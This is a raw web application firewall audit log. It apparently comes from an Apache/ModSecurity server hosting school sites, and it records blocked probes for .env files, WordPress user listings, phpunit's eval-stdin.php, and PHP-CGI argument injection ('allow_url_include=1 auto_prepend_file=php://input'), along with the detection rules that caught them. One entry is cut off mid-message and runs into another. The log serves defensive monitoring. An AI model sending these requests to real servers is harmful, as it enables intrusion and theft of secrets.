p2=1077, p3=0, p4=0, p5=33, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86bed649-Z-- --224e8403-A-- [12/Jun/2025:06:13:15 +0700] aEoNi6F10OasdbQdujiUhwAAANU 103.236.140.4 43348 103.236.140.4 8181 --224e8403-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.150.255.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.150.255.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --224e8403-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --224e8403-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749683595059863 2412 (- - -) Stopwatch2: 1749683595059863 2412; combined=1111, p1=364, p2=719, p3=0, p4=0, p5=28, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --224e8403-Z-- --3f0d4e0e-A-- [12/Jun/2025:06:40:01 +0700] aEoT0cCW7vAFWQIjJpzr7AAAAEQ 103.236.140.4 59938 103.236.140.4 8181 --3f0d4e0e-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --3f0d4e0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f0d4e0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749685201789683 740 (- - -) Stopwatch2: 1749685201789683 740; combined=311, p1=275, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f0d4e0e-Z-- --12206a0a-A-- [12/Jun/2025:06:53:32 +0700] aEoW_KF10OasdbQdujjPmwAAAME 103.236.140.4 38628 103.236.140.4 8181 --12206a0a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 212.237.127.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 212.237.127.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --12206a0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12206a0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749686012404334 2380 (- - -) Stopwatch2: 1749686012404334 2380; combined=1057, p1=337, p2=693, p3=0, p4=0, p5=27, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12206a0a-Z-- --fe90ce23-A-- [12/Jun/2025:06:54:45 +0700] aEoXRWDP2O-J0msTyvWrvwAAAI8 103.236.140.4 41374 103.236.140.4 8181 --fe90ce23-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0 Accept-Charset: utf-8 --fe90ce23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe90ce23-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749686085568857 711 (- - -) Stopwatch2: 1749686085568857 711; combined=298, p1=262, p2=0, p3=0, p4=0, p5=35, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe90ce23-Z-- --21d06b23-A-- [12/Jun/2025:07:22:38 +0700] aEodzsCW7vAFWQIjJpwcoAAAAEA 103.236.140.4 50024 103.236.140.4 8181 --21d06b23-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 189.112.34.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 189.112.34.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --21d06b23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21d06b23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749687758549691 3284 (- - -) Stopwatch2: 1749687758549691 3284; combined=1734, p1=562, p2=1144, p3=0, p4=0, p5=28, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21d06b23-Z-- --c2e7932a-A-- [12/Jun/2025:08:43:52 +0700] aEow2MCW7vAFWQIjJpxxugAAAEs 103.236.140.4 38228 103.236.140.4 8181 --c2e7932a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 47.93.235.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.93.235.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2e7932a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2e7932a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749692632616679 4220 (- - -) Stopwatch2: 1749692632616679 4220; combined=2428, p1=782, p2=1593, p3=0, p4=0, p5=52, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2e7932a-Z-- --5a5e040f-A-- [12/Jun/2025:08:59:46 +0700] aEo0kviOwnjCOc5ARoVY3AAAAAc 103.236.140.4 45750 103.236.140.4 8181 --5a5e040f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.0.154.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.0.154.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5a5e040f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a5e040f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749693586638085 27728 (- - -) Stopwatch2: 1749693586638085 27728; combined=51022, p1=401, p2=790, p3=0, p4=0, p5=24938, sr=59, sw=0, l=0, gc=24893 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a5e040f-Z-- --e6935f3e-A-- [12/Jun/2025:09:06:12 +0700] aEo2FPiOwnjCOc5ARoVdoQAAABY 103.236.140.4 60336 103.236.140.4 8181 --e6935f3e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.79.248.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.79.248.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e6935f3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6935f3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749693972882067 2785 (- - -) Stopwatch2: 1749693972882067 2785; combined=1162, p1=405, p2=716, p3=0, p4=0, p5=41, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6935f3e-Z-- --e1e78370-A-- [12/Jun/2025:09:07:27 +0700] aEo2X8CW7vAFWQIjJpyQHAAAAFc 103.236.140.4 34940 103.236.140.4 8181 --e1e78370-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 150.136.76.116 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 150.136.76.116 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --e1e78370-C-- --e1e78370-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1e78370-E-- --e1e78370-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749694047960128 7031 (- - -) Stopwatch2: 1749694047960128 7031; combined=5000, p1=765, p2=4191, p3=0, p4=0, p5=43, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1e78370-Z-- --9c047127-A-- [12/Jun/2025:10:03:45 +0700] aEpDkaF10OasdbQdujjALAAAAM4 103.236.140.4 56856 103.236.140.4 8181 --9c047127-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.87.154 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.87.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9c047127-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c047127-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749697425392565 721 (- - -) Stopwatch2: 1749697425392565 721; combined=291, p1=261, p2=0, p3=0, p4=0, p5=30, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c047127-Z-- --85a90350-A-- [12/Jun/2025:10:19:34 +0700] aEpHRqF10OasdbQdujjYlQAAANM 103.236.140.4 52086 103.236.140.4 8181 --85a90350-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.191.35 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.191.35 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 Accept-Charset: utf-8 --85a90350-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85a90350-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749698374601954 673 (- - -) Stopwatch2: 1749698374601954 673; combined=279, p1=243, p2=0, p3=0, p4=0, p5=35, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85a90350-Z-- --7bb07c56-A-- [12/Jun/2025:10:46:38 +0700] aEpNnmDP2O-J0msTyvWylwAAAIM 103.236.140.4 52134 103.236.140.4 8181 --7bb07c56-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.118.46.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.118.46.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7bb07c56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bb07c56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749699998225004 2469 (- - -) Stopwatch2: 1749699998225004 2469; combined=1110, p1=383, p2=697, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bb07c56-Z-- --ce76e33e-A-- [12/Jun/2025:11:15:08 +0700] aEpUTGDP2O-J0msTyvXOYgAAAIg 103.236.140.4 59322 103.236.140.4 8181 --ce76e33e-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 157.66.56.29 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 129 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 157.66.56.29 Cookie: X-Varnish: 174554047 --ce76e33e-C-- --ce76e33e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce76e33e-E-- --ce76e33e-H-- Message: Access denied with code 403 (phase 2). String match " --54715432-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54715432-E-- --54715432-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749703192604425 4658 (- - -) Stopwatch2: 1749703192604425 4658; combined=3376, p1=492, p2=2847, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54715432-Z-- --01ef1817-A-- [12/Jun/2025:11:49:17 +0700] aEpcTaF10OasdbQdujhVBQAAAME 103.236.140.4 51352 103.236.140.4 8181 --01ef1817-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 Accept-Charset: utf-8 --01ef1817-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01ef1817-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749703757785829 739 (- - -) Stopwatch2: 1749703757785829 739; combined=301, p1=257, p2=0, p3=0, p4=0, p5=44, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01ef1817-Z-- --c67ebf6d-A-- [12/Jun/2025:13:43:25 +0700] aEp3DcCW7vAFWQIjJpzEwgAAAFM 103.236.140.4 52110 103.236.140.4 8181 --c67ebf6d-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 31.56.56.152 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 31.56.56.152 Accept-Encoding: gzip X-Varnish: 174554562 --c67ebf6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c67ebf6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749710605831571 613 (- - -) Stopwatch2: 1749710605831571 613; combined=247, p1=216, p2=0, p3=0, p4=0, p5=31, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c67ebf6d-Z-- --15798246-A-- [12/Jun/2025:13:46:15 +0700] aEp3t8CW7vAFWQIjJpzHMwAAAE0 103.236.140.4 58394 103.236.140.4 8181 --15798246-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.232.112.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.232.112.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --15798246-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15798246-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749710775515126 2485 (- - -) Stopwatch2: 1749710775515126 2485; combined=1035, p1=387, p2=628, p3=0, p4=0, p5=20, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15798246-Z-- --4a0fc678-A-- [12/Jun/2025:14:03:22 +0700] aEp7umDP2O-J0msTyvV6kAAAAIQ 103.236.140.4 39522 103.236.140.4 8181 --4a0fc678-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 209.97.180.8 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 209.97.180.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --4a0fc678-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a0fc678-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749711802174820 1055 (- - -) Stopwatch2: 1749711802174820 1055; combined=380, p1=345, p2=0, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a0fc678-Z-- --94045d62-A-- [12/Jun/2025:14:13:51 +0700] aEp-L6F10OasdbQdujgeuQAAANg 103.236.140.4 34480 103.236.140.4 8181 --94045d62-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 165.227.173.41 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 165.227.173.41 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --94045d62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 